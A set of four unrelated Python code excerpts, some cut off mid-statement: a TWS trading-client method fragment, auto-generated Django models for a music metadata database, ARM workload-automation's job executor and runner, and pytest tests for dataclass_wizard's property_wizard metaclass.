self._send(self.CANCEL_HISTORICAL_DATA)
self._send(VERSION)
self._send(id)
@synchronized
@requestmethod(has_id=True, min_server=MIN_SERVER_VER_REAL_TIME_BARS,
min_server_error_suffix="It does not support realtime bar data query cancellation.",
generic_error=_EClientErrors.FAIL_SEND_CANRTBARS)
def cancelRealTimeBars(self, id):
assert isinstance(id, int)
VERSION = 1
self._send(self.CANCEL_REAL_TIME_BARS)
self._send(VERSION)
self._send(id)
@synchronized
@requestmethod(has_id=True, min_server=16,
min_server_error_suffix="It does not support historical data backfill.",
generic_error=_EClientErrors.FAIL_SEND_REQHISTDATA)
def reqHistoricalData(self, id, contract, end_date_time, duration_str,
bar_size_setting, what_to_show, use_RTH, format_date):
assert isinstance(id, int)
assert isinstance(contract, __import__("tws").Contract)
assert isinstance(end_date_time, str)
assert isinstance(duration_str, str)
assert isinstance(bar_size_setting, str)
assert isinstance(what_to_show, str)
assert | |
# This is an auto-generated Django model module.
# You'll have to do the following manually to clean this up:
# * Rearrange models' order
# * Make sure each model has one field with primary_key=True
# * Make sure each ForeignKey has `on_delete` set to the desired behavior.
# * Remove `managed = False` lines if you wish to allow Django to create, modify, and delete the table
# Feel free to rename the models, but don't rename db_table values or field names.
from django.db import models
class AlternativeMedium(models.Model):
medium = models.IntegerField()
alternative_release = models.IntegerField()
name = models.CharField(max_length=200, blank=True, null=True)
class Meta:
managed = False
db_table = 'alternative_medium'
class AlternativeMediumTrack(models.Model):
alternative_medium = models.IntegerField(primary_key=True)
track = models.IntegerField()
alternative_track = models.IntegerField()
class Meta:
managed = False
db_table = 'alternative_medium_track'
unique_together = (('alternative_medium', 'track'),)
class AlternativeRelease(models.Model):
gid = models.UUIDField()
release = models.IntegerField()
name = models.CharField(max_length=200, blank=True, null=True)
artist_credit = models.IntegerField(blank=True, null=True)
type = models.IntegerField()
language = models.IntegerField()
script = models.IntegerField()
comment = models.CharField(max_length=255)
class Meta:
managed = False
db_table = 'alternative_release'
class AlternativeReleaseType(models.Model):
name = models.TextField()
parent = models.IntegerField(blank=True, null=True)
child_order = models.IntegerField()
description = models.TextField(blank=True, null=True)
gid = models.UUIDField()
class Meta:
managed = False
db_table = 'alternative_release_type'
class AlternativeTrack(models.Model):
name = models.CharField(max_length=200, blank=True, null=True)
artist_credit = models.IntegerField(blank=True, null=True)
ref_count = models.IntegerField()
class Meta:
managed = False
db_table = 'alternative_track'
class Annotation(models.Model):
editor = models.IntegerField()
text = models.TextField(blank=True, null=True)
changelog = models.CharField(max_length=255, blank=True, null=True)
created = models.DateTimeField(blank=True, null=True)
class Meta:
managed = False
db_table = 'annotation'
class Application(models.Model):
owner = models.IntegerField()
name = models.TextField()
oauth_id = models.TextField()
oauth_secret = models.TextField()
oauth_redirect_uri = models.TextField(blank=True, null=True)
class Meta:
managed = False
db_table = 'application'
class Area(models.Model):
gid = models.UUIDField()
name = models.CharField(max_length=200)
type = models.IntegerField(blank=True, null=True)
edits_pending = models.IntegerField()
last_updated = models.DateTimeField(blank=True, null=True)
begin_date_year = models.SmallIntegerField(blank=True, null=True)
begin_date_month = models.SmallIntegerField(blank=True, null=True)
begin_date_day = models.SmallIntegerField(blank=True, null=True)
end_date_year = models.SmallIntegerField(blank=True, null=True)
end_date_month = models.SmallIntegerField(blank=True, null=True)
end_date_day = models.SmallIntegerField(blank=True, null=True)
ended = models.BooleanField()
comment = models.CharField(max_length=255)
class Meta:
# managed = False
db_table = 'area'
def __str__(self):
return self.name
class AreaAlias(models.Model):
area = models.IntegerField()
name = models.CharField(max_length=200)
locale = models.TextField(blank=True, null=True)
edits_pending = models.IntegerField()
last_updated = models.DateTimeField(blank=True, null=True)
type = models.IntegerField(blank=True, null=True)
sort_name = models.CharField(max_length=200)
begin_date_year = models.SmallIntegerField(blank=True, null=True)
begin_date_month = models.SmallIntegerField(blank=True, null=True)
begin_date_day = models.SmallIntegerField(blank=True, null=True)
end_date_year = models.SmallIntegerField(blank=True, null=True)
end_date_month = models.SmallIntegerField(blank=True, null=True)
end_date_day = models.SmallIntegerField(blank=True, null=True)
primary_for_locale = models.BooleanField()
ended = models.BooleanField()
class Meta:
managed = False
db_table = 'area_alias'
class AreaAliasType(models.Model):
name = models.TextField()
parent = models.IntegerField(blank=True, null=True)
child_order = models.IntegerField()
description = models.TextField(blank=True, null=True)
gid = models.UUIDField()
class Meta:
managed = False
db_table = 'area_alias_type'
class AreaAnnotation(models.Model):
area = models.IntegerField(primary_key=True)
annotation = models.IntegerField()
class Meta:
managed = False
db_table = 'area_annotation'
unique_together = (('area', 'annotation'),)
class AreaAttribute(models.Model):
area = models.IntegerField()
area_attribute_type = models.IntegerField()
area_attribute_type_allowed_value = models.IntegerField(blank=True, null=True)
area_attribute_text = models.TextField(blank=True, null=True)
class Meta:
managed = False
db_table = 'area_attribute'
class AreaAttributeType(models.Model):
name = models.CharField(max_length=255)
comment = models.CharField(max_length=255)
free_text = models.BooleanField()
parent = models.IntegerField(blank=True, null=True)
child_order = models.IntegerField()
description = models.TextField(blank=True, null=True)
gid = models.UUIDField()
class Meta:
managed = False
db_table = 'area_attribute_type'
class AreaAttributeTypeAllowedValue(models.Model):
area_attribute_type = models.IntegerField()
value = models.TextField(blank=True, null=True)
parent = models.IntegerField(blank=True, null=True)
child_order = models.IntegerField()
description = models.TextField(blank=True, null=True)
gid = models.UUIDField()
class Meta:
managed = False
db_table = 'area_attribute_type_allowed_value'
class AreaGidRedirect(models.Model):
gid = models.UUIDField(primary_key=True)
new_id = models.IntegerField()
created = models.DateTimeField(blank=True, null=True)
class Meta:
managed = False
db_table = 'area_gid_redirect'
class AreaTag(models.Model):
area = models.IntegerField(primary_key=True)
tag = models.IntegerField()
count = models.IntegerField()
last_updated = models.DateTimeField(blank=True, null=True)
class Meta:
managed = False
db_table = 'area_tag'
unique_together = (('area', 'tag'),)
class AreaTagRaw(models.Model):
area = models.IntegerField(primary_key=True)
editor = models.IntegerField()
tag = models.IntegerField()
is_upvote = models.BooleanField()
class Meta:
managed = False
db_table = 'area_tag_raw'
unique_together = (('area', 'editor', 'tag'),)
class AreaType(models.Model):
name = models.CharField(max_length=255)
parent = models.IntegerField(blank=True, null=True)
child_order = models.IntegerField()
description = models.TextField(blank=True, null=True)
gid = models.UUIDField()
class Meta:
managed = False
db_table = 'area_type'
class Artist(models.Model):
id = models.IntegerField(primary_key=True)
gid = models.UUIDField()
name = models.CharField(max_length=200)
sort_name = models.CharField(max_length=200)
begin_date_year = models.SmallIntegerField(blank=True, null=True)
begin_date_month = models.SmallIntegerField(blank=True, null=True)
begin_date_day = models.SmallIntegerField(blank=True, null=True)
end_date_year = models.SmallIntegerField(blank=True, null=True)
end_date_month = models.SmallIntegerField(blank=True, null=True)
end_date_day = models.SmallIntegerField(blank=True, null=True)
# type = models.IntegerField(blank=True, null=True)
type2 = models.ForeignKey('ArtistType', to_field='id', db_column='type', on_delete=models.CASCADE,
blank=True,
null=True)
# area = models.IntegerField(blank=True, null=True)
area = models.ForeignKey('Area', to_field='id', db_column='area', on_delete=models.CASCADE, )
# gender = models.IntegerField(blank=True, null=True)
gender = models.ForeignKey('Gender', to_field='id', db_column='gender', on_delete=models.CASCADE,
blank=True,
null=True)
comment = models.CharField(max_length=255)
edits_pending = models.IntegerField()
last_updated = models.DateTimeField(blank=True, null=True)
ended = models.BooleanField()
begin_area = models.IntegerField(blank=True, null=True)
end_area = models.IntegerField(blank=True, null=True)
def __str__(self):
return self.name
class Meta:
# managed = False
db_table = 'artist'
class ArtistAlias(models.Model):
artist = models.IntegerField()
name = models.CharField(max_length=200)
locale = models.TextField(blank=True, null=True)
edits_pending = models.IntegerField()
last_updated = models.DateTimeField(blank=True, null=True)
type = models.IntegerField(blank=True, null=True)
sort_name = models.CharField(max_length=200)
begin_date_year = models.SmallIntegerField(blank=True, null=True)
begin_date_month = models.SmallIntegerField(blank=True, null=True)
begin_date_day = models.SmallIntegerField(blank=True, null=True)
end_date_year = models.SmallIntegerField(blank=True, null=True)
end_date_month = models.SmallIntegerField(blank=True, null=True)
end_date_day = models.SmallIntegerField(blank=True, null=True)
primary_for_locale = models.BooleanField()
ended = models.BooleanField()
class Meta:
managed = False
db_table = 'artist_alias'
class ArtistAliasType(models.Model):
name = models.TextField()
parent = models.IntegerField(blank=True, null=True)
child_order = models.IntegerField()
description = models.TextField(blank=True, null=True)
gid = models.UUIDField()
class Meta:
managed = False
db_table = 'artist_alias_type'
class ArtistAnnotation(models.Model):
artist = models.IntegerField(primary_key=True)
annotation = models.IntegerField()
class Meta:
managed = False
db_table = 'artist_annotation'
unique_together = (('artist', 'annotation'),)
class ArtistAttribute(models.Model):
artist = models.IntegerField()
artist_attribute_type = models.IntegerField()
artist_attribute_type_allowed_value = models.IntegerField(blank=True, null=True)
artist_attribute_text = models.TextField(blank=True, null=True)
class Meta:
managed = False
db_table = 'artist_attribute'
class ArtistAttributeType(models.Model):
name = models.CharField(max_length=255)
comment = models.CharField(max_length=255)
free_text = models.BooleanField()
parent = models.IntegerField(blank=True, null=True)
child_order = models.IntegerField()
description = models.TextField(blank=True, null=True)
gid = models.UUIDField()
class Meta:
managed = False
db_table = 'artist_attribute_type'
class ArtistAttributeTypeAllowedValue(models.Model):
artist_attribute_type = models.IntegerField()
value = models.TextField(blank=True, null=True)
parent = models.IntegerField(blank=True, null=True)
child_order = models.IntegerField()
description = models.TextField(blank=True, null=True)
gid = models.UUIDField()
class Meta:
# managed = False
db_table = 'artist_attribute_type_allowed_value'
class ArtistCredit(models.Model):
id = models.IntegerField(primary_key=True)
name = models.CharField(max_length=200)
artist_count = models.SmallIntegerField()
ref_count = models.IntegerField(blank=True, null=True)
created = models.DateTimeField(blank=True, null=True)
artist = models.ManyToManyField(Artist, through='ArtistCreditName')
def __str__(self):
return self.name
class Meta:
# managed = True
db_table = 'artist_credit'
class ArtistCreditName(models.Model):
# artist_credit = models.IntegerField(primary_key=True)
artist_credit = models.ForeignKey(ArtistCredit, on_delete=models.CASCADE)
position = models.SmallIntegerField()
# artist = models.IntegerField()
artist = models.ForeignKey(Artist, on_delete=models.CASCADE)
name = models.CharField(max_length=200)
join_phrase = models.TextField()
class Meta:
# managed = True
db_table = 'artist_credit_name'
unique_together = (('artist_credit', 'position', 'artist'),)
class ArtistGidRedirect(models.Model):
gid = models.UUIDField(primary_key=True)
new_id = models.IntegerField()
created = models.DateTimeField(blank=True, null=True)
class Meta:
managed = False
db_table = 'artist_gid_redirect'
class ArtistIpi(models.Model):
artist = models.IntegerField(primary_key=True)
ipi = models.CharField(max_length=11)
edits_pending = models.IntegerField()
created = models.DateTimeField(blank=True, null=True)
class Meta:
# managed = False
db_table = 'artist_ipi'
unique_together = (('artist', 'ipi'),)
class ArtistIsni(models.Model):
artist = models.IntegerField(primary_key=True)
isni = models.CharField(max_length=16)
edits_pending = models.IntegerField()
created = models.DateTimeField(blank=True, null=True)
class Meta:
managed = False
db_table = 'artist_isni'
unique_together = (('artist', 'isni'),)
class ArtistMeta(models.Model):
id = models.IntegerField(primary_key=True)
rating = models.SmallIntegerField(blank=True, null=True)
rating_count = models.IntegerField(blank=True, null=True)
class Meta:
managed = False
db_table = 'artist_meta'
class ArtistRatingRaw(models.Model):
artist = models.IntegerField(primary_key=True)
editor = models.IntegerField()
rating = models.SmallIntegerField()
class Meta:
managed = False
db_table = 'artist_rating_raw'
unique_together = (('artist', 'editor'),)
class ArtistTag(models.Model):
artist = models.IntegerField(primary_key=True)
tag = models.IntegerField()
count = models.IntegerField()
last_updated = models.DateTimeField(blank=True, null=True)
class Meta:
managed = False
db_table = 'artist_tag'
unique_together = (('artist', 'tag'),)
class ArtistTagRaw(models.Model):
artist = models.IntegerField(primary_key=True)
editor = models.IntegerField()
tag = models.IntegerField()
is_upvote = models.BooleanField()
class Meta:
managed = False
db_table = 'artist_tag_raw'
unique_together = (('artist', 'editor', 'tag'),)
class ArtistType(models.Model):
name = models.CharField(max_length=255)
parent = models.IntegerField(blank=True, null=True)
child_order = models.IntegerField()
description = models.TextField(blank=True, null=True)
gid = models.UUIDField()
class Meta:
# managed = False
db_table = 'artist_type'
def __str__(self):
return self.name
class AuthGroup(models.Model):
name = models.CharField(unique=True, max_length=80)
class Meta:
managed = False
db_table = 'auth_group'
class AuthGroupPermissions(models.Model):
group = models.ForeignKey(AuthGroup, models.DO_NOTHING)
permission = models.ForeignKey('AuthPermission', models.DO_NOTHING)
class Meta:
managed = False
db_table = 'auth_group_permissions'
unique_together = (('group', 'permission'),)
class AuthPermission(models.Model):
name = models.CharField(max_length=255)
content_type = models.ForeignKey('DjangoContentType', models.DO_NOTHING)
codename = models.CharField(max_length=100)
class Meta:
managed = False
db_table = 'auth_permission'
unique_together = (('content_type', 'codename'),)
class AuthUser(models.Model):
password = models.CharField(max_length=128)
last_login = models.DateTimeField(blank=True, null=True)
is_superuser = models.BooleanField()
username = models.CharField(unique=True, max_length=150)
first_name = models.CharField(max_length=30)
last_name = models.CharField(max_length=150)
email = models.CharField(max_length=254)
is_staff = models.BooleanField()
is_active = models.BooleanField()
date_joined = models.DateTimeField()
class Meta:
managed = False
db_table = 'auth_user'
class | |
<reponame>Rahlubenru/workload-automation<gh_stars>0
# Copyright 2013-2015 ARM Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# pylint: disable=no-member
import logging
import os
import shutil
from copy import copy
from datetime import datetime
import wa.framework.signal as signal
from wa.framework import instrument
from wa.framework.configuration.core import Status
from wa.framework.exception import TargetError, HostError, WorkloadError,\
TargetNotRespondingError, TimeoutError
from wa.framework.job import Job
from wa.framework.output import init_job_output
from wa.framework.output_processor import ProcessorManager
from wa.framework.resource import ResourceResolver
from wa.framework.target.manager import TargetManager
from wa.utils import log
from wa.utils.misc import merge_config_values, format_duration
class ExecutionContext(object):
@property
def previous_job(self):
if not self.job_queue:
return None
return self.job_queue[0]
@property
def next_job(self):
if not self.completed_jobs:
return None
return self.completed_jobs[-1]
@property
def spec_changed(self):
if self.previous_job is None and self.current_job is not None: # Start of run
return True
if self.previous_job is not None and self.current_job is None: # End of run
return True
return self.current_job.spec.id != self.previous_job.spec.id
@property
def spec_will_change(self):
if self.current_job is None and self.next_job is not None: # Start of run
return True
if self.current_job is not None and self.next_job is None: # End of run
return True
return self.current_job.spec.id != self.next_job.spec.id
@property
def workload(self):
if self.current_job:
return self.current_job.workload
@property
def job_output(self):
if self.current_job:
return self.current_job.output
@property
def output(self):
if self.current_job:
return self.job_output
return self.run_output
@property
def output_directory(self):
return self.output.basepath
def __init__(self, cm, tm, output):
self.logger = logging.getLogger('context')
self.cm = cm
self.tm = tm
self.run_output = output
self.run_state = output.state
self.target_info = self.tm.get_target_info()
self.logger.debug('Loading resource discoverers')
self.resolver = ResourceResolver(cm.plugin_cache)
self.resolver.load()
self.job_queue = None
self.completed_jobs = None
self.current_job = None
self.successful_jobs = 0
self.failed_jobs = 0
self.run_interrupted = False
def start_run(self):
self.output.info.start_time = datetime.utcnow()
self.output.write_info()
self.job_queue = copy(self.cm.jobs)
self.completed_jobs = []
self.run_state.status = Status.STARTED
self.output.status = Status.STARTED
self.output.write_state()
def end_run(self):
if self.successful_jobs:
if self.failed_jobs:
status = Status.PARTIAL
else:
status = Status.OK
else:
status = Status.FAILED
self.run_state.status = status
self.run_output.status = status
self.run_output.info.end_time = datetime.utcnow()
self.run_output.info.duration = self.run_output.info.end_time -\
self.run_output.info.start_time
self.run_output.write_info()
self.run_output.write_state()
self.run_output.write_result()
def finalize(self):
self.tm.finalize()
def start_job(self):
if not self.job_queue:
raise RuntimeError('No jobs to run')
self.current_job = self.job_queue.pop(0)
job_output = init_job_output(self.run_output, self.current_job)
self.current_job.set_output(job_output)
self.update_job_state(self.current_job)
self.tm.start()
return self.current_job
def end_job(self):
if not self.current_job:
raise RuntimeError('No jobs in progress')
self.tm.stop()
self.completed_jobs.append(self.current_job)
self.update_job_state(self.current_job)
self.output.write_result()
self.current_job = None
def set_status(self, status, force=False):
if not self.current_job:
raise RuntimeError('No jobs in progress')
self.current_job.set_status(status, force)
def extract_results(self):
self.tm.extract_results(self)
def move_failed(self, job):
self.run_output.move_failed(job.output)
def update_job_state(self, job):
self.run_state.update_job(job)
self.run_output.write_state()
def skip_job(self, job):
job.status = Status.SKIPPED
self.run_state.update_job(job)
self.completed_jobs.append(job)
def skip_remaining_jobs(self):
while self.job_queue:
job = self.job_queue.pop(0)
self.skip_job(job)
self.write_state()
def write_state(self):
self.run_output.write_state()
def get_metric(self, name):
try:
return self.output.get_metric(name)
except HostError:
if not self.current_job:
raise
return self.run_output.get_metric(name)
def add_metric(self, name, value, units=None, lower_is_better=False,
classifiers=None):
if self.current_job:
classifiers = merge_config_values(self.current_job.classifiers,
classifiers)
self.output.add_metric(name, value, units, lower_is_better, classifiers)
def get_artifact(self, name):
try:
return self.output.get_artifact(name)
except HostError:
if not self.current_job:
raise
return self.run_output.get_artifact(name)
def get_artifact_path(self, name):
try:
return self.output.get_artifact_path(name)
except HostError:
if not self.current_job:
raise
return self.run_output.get_artifact_path(name)
def add_artifact(self, name, path, kind, description=None, classifiers=None):
self.output.add_artifact(name, path, kind, description, classifiers)
def add_run_artifact(self, name, path, kind, description=None,
classifiers=None):
self.run_output.add_artifact(name, path, kind, description, classifiers)
def add_event(self, message):
self.output.add_event(message)
def take_screenshot(self, filename):
filepath = self._get_unique_filepath(filename)
self.tm.target.capture_screen(filepath)
self.add_artifact('screenshot', filepath, kind='log')
def take_uiautomator_dump(self, filename):
filepath = self._get_unique_filepath(filename)
self.tm.target.capture_ui_hierarchy(filepath)
self.add_artifact('uitree', filepath, kind='log')
def record_ui_state(self, basename):
self.logger.info('Recording screen state...')
self.take_screenshot('{}.png'.format(basename))
target = self.tm.target
if target.os == 'android' or\
(target.os == 'chromeos' and target.has('android_container')):
self.take_uiautomator_dump('{}.uix'.format(basename))
def initialize_jobs(self):
new_queue = []
failed_ids = []
for job in self.job_queue:
if job.id in failed_ids:
# Don't try to initialize a job if another job with the same ID
# (i.e. same job spec) has failed - we can assume it will fail
# too.
self.skip_job(job)
continue
try:
job.initialize(self)
except WorkloadError as e:
job.set_status(Status.FAILED)
log.log_error(e, self.logger)
failed_ids.append(job.id)
if self.cm.run_config.bail_on_init_failure:
raise
else:
new_queue.append(job)
self.job_queue = new_queue
def _get_unique_filepath(self, filename):
filepath = os.path.join(self.output_directory, filename)
rest, ext = os.path.splitext(filepath)
i = 1
new_filepath = '{}-{}{}'.format(rest, i, ext)
if not os.path.exists(filepath) and not os.path.exists(new_filepath):
return filepath
elif not os.path.exists(new_filepath):
# new_filepath does not exit, thefore filepath must exit.
# this is the first collision
shutil.move(filepath, new_filepath)
while os.path.exists(new_filepath):
i += 1
new_filepath = '{}-{}{}'.format(rest, i, ext)
return new_filepath
class Executor(object):
"""
The ``Executor``'s job is to set up the execution context and pass to a
``Runner`` along with a loaded run specification. Once the ``Runner`` has
done its thing, the ``Executor`` performs some final reporting before
returning.
The initial context set up involves combining configuration from various
sources, loading of requided workloads, loading and installation of
instruments and output processors, etc. Static validation of the combined
configuration is also performed.
"""
# pylint: disable=R0915
def __init__(self):
self.logger = logging.getLogger('executor')
self.error_logged = False
self.warning_logged = False
self.target_manager = None
self.device = None
def execute(self, config_manager, output):
"""
Execute the run specified by an agenda. Optionally, selectors may be
used to only selecute a subset of the specified agenda.
Params::
:state: a ``ConfigManager`` containing processed configuration
:output: an initialized ``RunOutput`` that will be used to
store the results.
"""
signal.connect(self._error_signalled_callback, signal.ERROR_LOGGED)
signal.connect(self._warning_signalled_callback, signal.WARNING_LOGGED)
self.logger.info('Initializing run')
self.logger.debug('Finalizing run configuration.')
config = config_manager.finalize()
output.write_config(config)
self.logger.info('Connecting to target')
self.target_manager = TargetManager(config.run_config.device,
config.run_config.device_config,
output.basepath)
output.set_target_info(self.target_manager.get_target_info())
self.logger.info('Initializing execution context')
context = ExecutionContext(config_manager, self.target_manager, output)
self.logger.info('Generating jobs')
config_manager.generate_jobs(context)
output.write_job_specs(config_manager.job_specs)
output.write_state()
self.logger.info('Installing instruments')
for instrument_name in config_manager.get_instruments(self.target_manager.target):
instrument.install(instrument_name, context)
instrument.validate()
self.logger.info('Installing output processors')
pm = ProcessorManager()
for proc in config_manager.get_processors():
pm.install(proc, context)
pm.validate()
self.logger.info('Starting run')
runner = Runner(context, pm)
signal.send(signal.RUN_STARTED, self)
runner.run()
context.finalize()
self.execute_postamble(context, output)
signal.send(signal.RUN_COMPLETED, self)
def execute_postamble(self, context, output):
self.logger.info('Done.')
duration = format_duration(output.info.duration)
self.logger.info('Run duration: {}'.format(duration))
num_ran = context.run_state.num_completed_jobs
status_summary = 'Ran a total of {} iterations: '.format(num_ran)
counter = context.run_state.get_status_counts()
parts = []
for status in reversed(Status.levels):
if status in counter:
parts.append('{} {}'.format(counter[status], status))
self.logger.info(status_summary + ', '.join(parts))
self.logger.info('Results can be found in {}'.format(output.basepath))
if self.error_logged:
self.logger.warn('There were errors during execution.')
self.logger.warn('Please see {}'.format(output.logfile))
elif self.warning_logged:
self.logger.warn('There were warnings during execution.')
self.logger.warn('Please see {}'.format(output.logfile))
def _error_signalled_callback(self, record):
self.error_logged = True
signal.disconnect(self._error_signalled_callback, signal.ERROR_LOGGED)
def _warning_signalled_callback(self, record):
self.warning_logged = True
signal.disconnect(self._warning_signalled_callback, signal.WARNING_LOGGED)
class Runner(object):
"""
Triggers running jobs and processing results
Takes pre-initialized ExcecutionContext and ProcessorManager. Handles
actually running the jobs, and triggers the ProcessorManager to handle
processing job and run results.
"""
def __init__(self, context, pm):
self.logger = logging.getLogger('runner')
self.context = context
self.pm = pm
self.output = self.context.output
self.config = self.context.cm
def run(self):
try:
self.initialize_run()
self.send(signal.RUN_INITIALIZED)
while self.context.job_queue:
if self.context.run_interrupted:
raise KeyboardInterrupt()
with signal.wrap('JOB_EXECUTION', self, self.context):
self.run_next_job(self.context)
except KeyboardInterrupt as e:
log.log_error(e, self.logger)
self.logger.info('Skipping remaining jobs.')
self.context.skip_remaining_jobs()
except Exception as e:
message = e.message if e.message else str(e)
log.log_error(e, self.logger)
self.logger.error('Skipping remaining jobs due to "{}".'.format(e))
self.context.skip_remaining_jobs()
raise e
finally:
self.finalize_run()
self.send(signal.RUN_FINALIZED)
def initialize_run(self):
self.logger.info('Initializing run')
signal.connect(self._error_signalled_callback, signal.ERROR_LOGGED)
signal.connect(self._warning_signalled_callback, signal.WARNING_LOGGED)
self.context.start_run()
self.pm.initialize()
log.indent()
self.context.initialize_jobs()
log.dedent()
self.context.write_state()
def finalize_run(self):
self.logger.info('Finalizing run')
self.context.end_run()
self.pm.enable_all()
self.pm.process_run_output(self.context)
self.pm.export_run_output(self.context)
self.pm.finalize()
log.indent()
for job in self.context.completed_jobs:
job.finalize(self.context)
log.dedent()
signal.disconnect(self._error_signalled_callback, signal.ERROR_LOGGED)
signal.disconnect(self._warning_signalled_callback, signal.WARNING_LOGGED)
def run_next_job(self, context):
job = context.start_job()
self.logger.info('Running job {}'.format(job.id))
try:
log.indent()
self.do_run_job(job, context)
job.set_status(Status.OK)
except (Exception, KeyboardInterrupt) as e: # pylint: disable=broad-except
log.log_error(e, self.logger)
if isinstance(e, KeyboardInterrupt):
context.run_interrupted = True
job.set_status(Status.ABORTED)
raise e
else:
job.set_status(Status.FAILED)
if isinstance(e, TargetNotRespondingError):
raise e
elif isinstance(e, TargetError):
context.tm.verify_target_responsive()
finally:
self.logger.info('Completing job {}'.format(job.id))
self.send(signal.JOB_COMPLETED)
context.end_job()
log.dedent()
self.check_job(job)
def do_run_job(self, job, context):
rc = self.context.cm.run_config
if job.workload.phones_home and not rc.allow_phone_home:
self.logger.warning('Skipping job {} ({}) due to allow_phone_home=False'
.format(job.id, job.workload.name))
self.context.skip_job(job)
return
job.set_status(Status.RUNNING)
self.send(signal.JOB_STARTED)
self.logger.info('Configuring augmentations')
job.configure_augmentations(context, self.pm)
with signal.wrap('JOB_TARGET_CONFIG', self, context):
job.configure_target(context)
try:
with signal.wrap('JOB_SETUP', self, context):
job.setup(context)
except Exception as e:
job.set_status(Status.FAILED)
log.log_error(e, self.logger)
if isinstance(e, TargetError) or isinstance(e, TimeoutError):
context.tm.verify_target_responsive()
self.context.record_ui_state('setup-error')
raise e
try:
try:
with signal.wrap('JOB_EXECUTION', self, context):
job.run(context)
except KeyboardInterrupt:
context.run_interrupted = True
job.set_status(Status.ABORTED)
raise
except Exception as e:
job.set_status(Status.FAILED)
log.log_error(e, self.logger)
if isinstance(e, TargetError) or isinstance(e, TimeoutError):
context.tm.verify_target_responsive()
self.context.record_ui_state('run-error')
raise e
finally:
try:
with signal.wrap('JOB_OUTPUT_PROCESSED', self, context):
job.process_output(context)
self.pm.process_job_output(context)
self.pm.export_job_output(context)
except Exception as e:
| |
import logging
from collections import defaultdict
from dataclasses import dataclass, field
from datetime import datetime
from typing import Union, List, ClassVar, DefaultDict, Set
import pytest
from dataclass_wizard import property_wizard
from ..conftest import Literal, Annotated, PY39_OR_ABOVE, PY310_OR_ABOVE
log = logging.getLogger(__name__)
def test_property_wizard_does_not_affect_normal_properties():
"""
The `property_wizard` should not otherwise affect normal properties (i.e. ones
that don't have their property names (or underscored names) annotated as a
dataclass field.
"""
@dataclass
class Vehicle(metaclass=property_wizard):
def __post_init__(self):
self.wheels = 4
self._my_prop = 0
@property
def wheels(self) -> int:
return self._wheels
@wheels.setter
def wheels(self, wheels: Union[int, str]):
self._wheels = int(wheels)
@property
def _my_prop(self) -> int:
return self.my_prop
@_my_prop.setter
def _my_prop(self, my_prop: Union[int, str]):
self.my_prop = int(my_prop) + 5
v = Vehicle()
log.debug(v)
assert v.wheels == 4
assert v._my_prop == 5
# These should all result in a `TypeError`, as neither `wheels` nor
# `_my_prop` are valid arguments to the constructor, as they are just
# normal properties.
with pytest.raises(TypeError):
_ = Vehicle(wheels=3)
with pytest.raises(TypeError):
_ = Vehicle('6')
with pytest.raises(TypeError):
_ = Vehicle(_my_prop=2)
v.wheels = '123'
assert v.wheels == 123, 'Expected assignment to use the setter method'
v._my_prop = '5'
assert v._my_prop == 10, 'Expected assignment to use the setter method'
def test_property_wizard_does_not_affect_read_only_properties():
"""
The `property_wizard` should not otherwise affect properties which are
read-only (i.e. ones which don't define a `setter` method)
"""
@dataclass
class Vehicle(metaclass=property_wizard):
list_of_wheels: list = field(default_factory=list)
@property
def wheels(self) -> int:
return len(self.list_of_wheels)
v = Vehicle()
log.debug(v)
assert v.wheels == 0
# AttributeError: can't set attribute
with pytest.raises(AttributeError):
v.wheels = 3
v = Vehicle(list_of_wheels=[1, 2, 1])
assert v.wheels == 3
v.list_of_wheels = [0]
assert v.wheels == 1
def test_property_wizard_does_not_error_when_forward_refs_are_declared():
"""
Using `property_wizard` when the dataclass has a forward reference
defined in a type annotation.
"""
@dataclass
class Vehicle(metaclass=property_wizard):
fire_truck: 'Truck'
cars: List['Car'] = field(default_factory=list)
_wheels: Union[int, str] = 4
@property
def wheels(self) -> int:
return self._wheels
@wheels.setter
def wheels(self, wheels: Union[int, str]):
self._wheels = int(wheels)
@dataclass
class Car:
tires: int
@dataclass
class Truck:
color: str
truck = Truck('red')
v = Vehicle(fire_truck=truck)
log.debug(v)
assert v.wheels == 4
v = Vehicle(fire_truck=truck, wheels=3)
log.debug(v)
assert v.wheels == 3
v = Vehicle(truck, [Car(4)], '6')
log.debug(v)
assert v.wheels == 6, 'The constructor should use our setter method'
v.wheels = '123'
assert v.wheels == 123, 'Expected assignment to use the setter method'
def test_property_wizard_with_public_property_and_underscored_field():
"""
Using `property_wizard` when the dataclass has an public property and an
underscored field name.
"""
@dataclass
class Vehicle(metaclass=property_wizard):
_wheels: Union[int, str] = 4
@property
def wheels(self) -> int:
return self._wheels
@wheels.setter
def wheels(self, wheels: Union[int, str]):
self._wheels = int(wheels)
v = Vehicle()
log.debug(v)
assert v.wheels == 4
# Note that my IDE complains here, and suggests `_wheels` as a possible
# keyword argument to the constructor method; however, that's wrong and
# will error if you try it way.
v = Vehicle(wheels=3)
log.debug(v)
assert v.wheels == 3
v = Vehicle('6')
log.debug(v)
assert v.wheels == 6, 'The constructor should use our setter method'
v.wheels = '123'
assert v.wheels == 123, 'Expected assignment to use the setter method'
def test_property_wizard_with_public_property_and_field():
"""
Using `property_wizard` when the dataclass has both a property and field
name *without* a leading underscore.
"""
@dataclass
class Vehicle(metaclass=property_wizard):
# The value of `wheels` here will be ignored, since `wheels` is simply
# re-assigned on the following property definition.
wheels: Union[int, str] = 4
@property
def wheels(self) -> int:
return self._wheels
@wheels.setter
def wheels(self, wheels: Union[int, str]):
self._wheels = int(wheels)
v = Vehicle()
log.debug(v)
assert v.wheels == 0
v = Vehicle(wheels=3)
log.debug(v)
assert v.wheels == 3
v = Vehicle('6')
log.debug(v)
assert v.wheels == 6, 'The constructor should use our setter method'
v.wheels = '123'
assert v.wheels == 123, 'Expected assignment to use the setter method'
@pytest.mark.skipif(not PY310_OR_ABOVE, reason='requires Python 3.10 or higher')
def test_property_wizard_with_public_property_and_field_with_or():
"""
Using `property_wizard` when the dataclass has both a property and field
name *without* a leading underscore, and using the OR ("|") operator in
Python 3.10+, instead of the `typing.Union` usage.
"""
@dataclass
class Vehicle(metaclass=property_wizard):
# The value of `wheels` here will be ignored, since `wheels` is simply
# re-assigned on the following property definition.
wheels: int | str = 4
@property
def wheels(self) -> int:
